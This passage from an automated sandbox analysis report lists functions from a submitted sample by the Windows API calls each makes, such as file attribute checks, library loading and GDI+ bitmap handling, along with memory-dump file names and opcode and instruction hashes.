Opcode Fuzzy Hash: 77a0d0fbbe9c4de77a7754eb5326555ea58ebef9930c68340244a53f9bd071d8
Instruction Fuzzy Hash: 0DE092355802096BEB129F75DC45FED77ECEF08381F4841AAB888C7190DF229D94EAA4

Function 00BC9F23 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,00BC9F18,?,00BC75EA,?,?,?,?), ref: 00BC9F34
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00BC9F18,?,00BC75EA,?,?,?,?), ref: 00BC9F60

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: ba4541441f602c2b124fe235aeecdd74cfd2ae75943774118100351603f73a98
Instruction ID: 2ac2b70acb6c95b46a2668cdd6ea0ee8085aea5d03cb5208d13269508b7d85ff
Opcode Fuzzy Hash: ba4541441f602c2b124fe235aeecdd74cfd2ae75943774118100351603f73a98
Instruction Fuzzy Hash: 63E01B3654111867DB11AB78DC05FE9B7ACDB083E1F0442E9FD94D3290DB715D55C6D0

Function 00BCFD16 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BCFD31
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BCE82C,Crypt32.dll,?,00BCE8AE,?,00BCE892,?,?,?,?), ref: 00BCFD53

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: f5f74415a87e2cd8824c4991245d338aefda70d91099c5c65ea7c0d0bc90ef91
Instruction ID: 5173ddf604ac3ab323812e00ef2392a71c7bcd98faa2243596080e2784dd4c47
Opcode Fuzzy Hash: f5f74415a87e2cd8824c4991245d338aefda70d91099c5c65ea7c0d0bc90ef91
Instruction Fuzzy Hash: B8E012769011186BDB119BA4DC05FEAB7ACEF08381F4400E6B949D3114DE749940CBE0

Function 00BD9401 Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00BD9422
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00BD9429

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 593c0ef4ca9b822e5fb331edeb76acfe42db4a7830655f73c60b2761e3d7faa8
Instruction ID: 36ff7cf5aba6b82945234efd93911786d2b82246425f8c1872b411dcc439ffb9
Opcode Fuzzy Hash: 593c0ef4ca9b822e5fb331edeb76acfe42db4a7830655f73c60b2761e3d7faa8
Instruction Fuzzy Hash: D0E0ED71905318EBCB20DF99C545BAAF7F8EB04721F10819BA88993701E6716E44AB91

Function 00BD9B7B Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,00BF146D,000000FF), ref: 00BD9BA4
CoUninitialize.COMBASE(?,?,?,00BF146D,000000FF), ref: 00BD9BA9

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 331df28071e7b2e53868f232b61d4eb0745aa47b8bb98d297618a29083ba317b
Instruction ID: 8d674e6306201aaa1a7c6d912b5faa2167cab7098d1fef53030af157f28955c7
Opcode Fuzzy Hash: 331df28071e7b2e53868f232b61d4eb0745aa47b8bb98d297618a29083ba317b
Instruction Fuzzy Hash: 31E01A72548644EFC321DB48DC05F55F7E8FB08B20F0047AAB91A83BA0DB356800CA91

Function 00BE1726 Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 00BE2877: try_get_function.LIBVCRUNTIME ref: 00BE288C

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BE1744
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00BE174F

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: ed340a435a3f8984ce8dee752a353a252d1a65077261e094c23b76a4dd3a5b6d
Instruction ID: 0d60e666da187acb26086039f15fdbe8e643559166a264e90bb8387e809dc4d7
Opcode Fuzzy Hash: ed340a435a3f8984ce8dee752a353a252d1a65077261e094c23b76a4dd3a5b6d
Instruction Fuzzy Hash: A4D0C9B9B087C1185E04277F785296926D89962FB57B01FEAF031CA8D2EF348C06B515

Function 00BC12B2 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00BC12C7
ShowWindow.USER32(00000000), ref: 00BC12CE

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 9f81d74ae47eb952174538896bb3afc781afe0a5690265e4b7a9d38e206962ce
Instruction ID: c81184c094d01a0d5a4e2da8621b7a9e57da502765b424be372d09e314311895
Opcode Fuzzy Hash: 9f81d74ae47eb952174538896bb3afc781afe0a5690265e4b7a9d38e206962ce
Instruction Fuzzy Hash: 19C01272068200BECB011BB0DC09D3EBBAAABA4212F04C90CB0A6C20A0CA38C010EB11

Function 00BC19C1 Relevance: 1.8, APIs: 1, Instructions: 275COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BC19C6

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f19090168e51fd3a875d252c4917a3c66b627a59318f43ef8c2e67d8e2d5ef9f
Instruction ID: 1362d0facfee916446146dc53a7ac55489212756aeab80c1b740d296c9b86d1c
Opcode Fuzzy Hash: f19090168e51fd3a875d252c4917a3c66b627a59318f43ef8c2e67d8e2d5ef9f
Instruction Fuzzy Hash: 14B1C270A00546AEEB18CF7CC494FB9FBE5FF16304F144A9DE465A7282C7719960CB91

Function 00BC825A Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BC825F

Part of subcall function 00BC136E: __EH_prolog.LIBCMT ref: 00BC1373
Part of subcall function 00BC136E: new.LIBCMT ref: 00BC13EB

Part of subcall function 00BC19C1: __EH_prolog.LIBCMT ref: 00BC19C6

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: c58a64f9b6e0afc1489c2229a3b5f71c1f2c8da3de0c142792e8c1bd972fabc2
Instruction ID: f6fe8e526602299c95e82af1948cf5476831527b6ed8f18a6ca916212eec7940
Opcode Fuzzy Hash: c58a64f9b6e0afc1489c2229a3b5f71c1f2c8da3de0c142792e8c1bd972fabc2
Instruction Fuzzy Hash: F541A1719006949ADB24EB60C855FEAB3F9AF50704F0404EEF58AA3093EB745EC8DB50

Function 00BD2AF2 Relevance: 1.6, APIs: 1, Instructions: 90COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BD2AF7

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 18d99c5da4971b537ce8dbffc99a99ad3540850e2ab4797a76fe50eec4f7e994
Instruction ID: d8f017ed5912406616b03efaf6bd9f5461c1c182be9be5200c47caaf85aae879
Opcode Fuzzy Hash: 18d99c5da4971b537ce8dbffc99a99ad3540850e2ab4797a76fe50eec4f7e994
Instruction Fuzzy Hash: 2821B4B1E41255ABDB149F78CC41B6AF7E8EF14314F0405BBE509AB781E7B49D40C6A8

Function 00BD9F62 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BD9F67

Part of subcall function 00BC136E: __EH_prolog.LIBCMT ref: 00BC1373
Part of subcall function 00BC136E: new.LIBCMT ref: 00BC13EB

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: bcac1cd87a567edb8db436485d9cebc0a38330701d8749a37eb381b21bfe23e9
Instruction ID: d268b0bc75b8bb04eb38761efec172bd4a4d599dbfb3864d99a86ca5cee43229
Opcode Fuzzy Hash: bcac1cd87a567edb8db436485d9cebc0a38330701d8749a37eb381b21bfe23e9
Instruction Fuzzy Hash: 0C215A71D04299AACF15DF98C9919EEF7F4AF19304F1004EEE809B7242E7356E05DB60

Function 00BC91A3 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BC91A8

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7d73ee41f676c6fc4626dd0e19af7543d9aa5cd5ee12bafb88cc3d971ff33e05
Instruction ID: 802946a3fc14fd6f258304f3cca8fd89484c028f2559de9979b2adeddf77151b
Opcode Fuzzy Hash: 7d73ee41f676c6fc4626dd0e19af7543d9aa5cd5ee12bafb88cc3d971ff33e05
Instruction Fuzzy Hash: 4B118677E00529A7DF12AF98CC45EDDBBB5EF94700F044599F815B7251CA318D1086A0

Function 00BCA7CC Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00BCA7DE

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f5fec0c36bbc145cb67a0e62e1ecb79f5c2867a708c15a5e5143fdd4c660255
Instruction ID: b6ea27f88afcf0935009540b628ce4e875b7debfc962f39a9a68449be1fc2f58
Opcode Fuzzy Hash: 6f5fec0c36bbc145cb67a0e62e1ecb79f5c2867a708c15a5e5143fdd4c660255
Instruction Fuzzy Hash: C2F0AF3091070D9FDB30DA28CC41F1ABBE4EB15334F208AAEE495C3280EB70E9808792

Function 00BC5B2D Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BC5B32

Part of subcall function 00BCADBF: __EH_prolog.LIBCMT ref: 00BCADC4

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 376e41b52e50e3f09ec4db5885543fa0e65a58e62c5b7b2b432421b11093e45c
Instruction ID: d8a56f76dd5a3a59fb4e7b7e3714bfd59ebf0c9521f56e4e6c6ce868d5540da8
Opcode Fuzzy Hash: 376e41b52e50e3f09ec4db5885543fa0e65a58e62c5b7b2b432421b11093e45c
Instruction Fuzzy Hash: 0801D170A01688DAC715EBA8E115BEDF7E49F15304F0040EDA44AA3282DBB82F04C7A3

Function 00BE7B00 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00BE3006,?,0000015D,?,?,?,?,00BE44E2,000000FF,00000000,?,?), ref: 00BE7B32

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fcbf348e0caf83c1269cc43a77ed925e3975c5cb36a375abd77dddf5853a58da
Instruction ID: b0a17d1370da239cfab0d8bd17a6aba381e3f83fcbd387d9f627fdd3cde22256
Opcode Fuzzy Hash: fcbf348e0caf83c1269cc43a77ed925e3975c5cb36a375abd77dddf5853a58da
Instruction Fuzzy Hash: 21E0ED312C92E667EA312A378C21B5B36CCDF613A1F2501E2AC19E2091EF60CC0082E0

Function 00BCA255 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00BCA284

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 8b00832328a63eb5c861b9d37bb0e63d5d809482522d7bd6b20bae15ec7fe73d
Instruction ID: 056cca8830b1076f32baa29b4d2167a68675c119efba4de322e9e288dbd803cd
Opcode Fuzzy Hash: 8b00832328a63eb5c861b9d37bb0e63d5d809482522d7bd6b20bae15ec7fe73d
Instruction Fuzzy Hash: 7DF0E931008390AACB2257B48804FDABBD06F46335F048A8DF4FE46192C6766085C732

Function 00BC1E9F Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BC1EA4

Part of subcall function 00BC1906: __EH_prolog.LIBCMT ref: 00BC190B

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 0b9750e62933d8968434148a04f37ea8ec7549033506376399afeeb7973a9597
Instruction ID: 72b4d2c3f20778dab731be01f71710a50cf599b8003713422cd83f750e3c803a
Opcode Fuzzy Hash: 0b9750e62933d8968434148a04f37ea8ec7549033506376399afeeb7973a9597
Instruction Fuzzy Hash: 25F074B1D041498ECF41EFAC8545BEDBBF5AB19300F0449AED409E7642E7359605CB91

Function 00BC1EA4 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BC1EA4

Part of subcall function 00BC1906: __EH_prolog.LIBCMT ref: 00BC190B

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 227b414101ecef702655c4b24e983e4544fb90e92d0f7a3ba207c890273304ee
Instruction ID: 664154357f186c754671dfb0d029e403e32a93b7d36117168e187cf6f10ff71f
Opcode Fuzzy Hash: 227b414101ecef702655c4b24e983e4544fb90e92d0f7a3ba207c890273304ee
Instruction Fuzzy Hash: 41F092B1D042898ECF41EFACC945BEEBBF5AB19300F0445AED409E7642EB355605CB91

Function 00BD02FF Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00BD0334

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: bec8e64145d9829d87f671e1e04deea84cb21edc762870fc434191a829c093ac
Instruction ID: 529ba5eba59dca8c4dd8442cff4ddb3e59bfd6584bb7a1e4eed910239528f13d
Opcode Fuzzy Hash: bec8e64145d9829d87f671e1e04deea84cb21edc762870fc434191a829c093ac
Instruction Fuzzy Hash: 19D0121172019116DA2173246845FFE66C68FC5324F1A00E7B10A773C2DA854887D2A2

Function 00BD9642 Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00BD9648

Part of subcall function 00BD9401: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00BD9422

Memory Dump Source

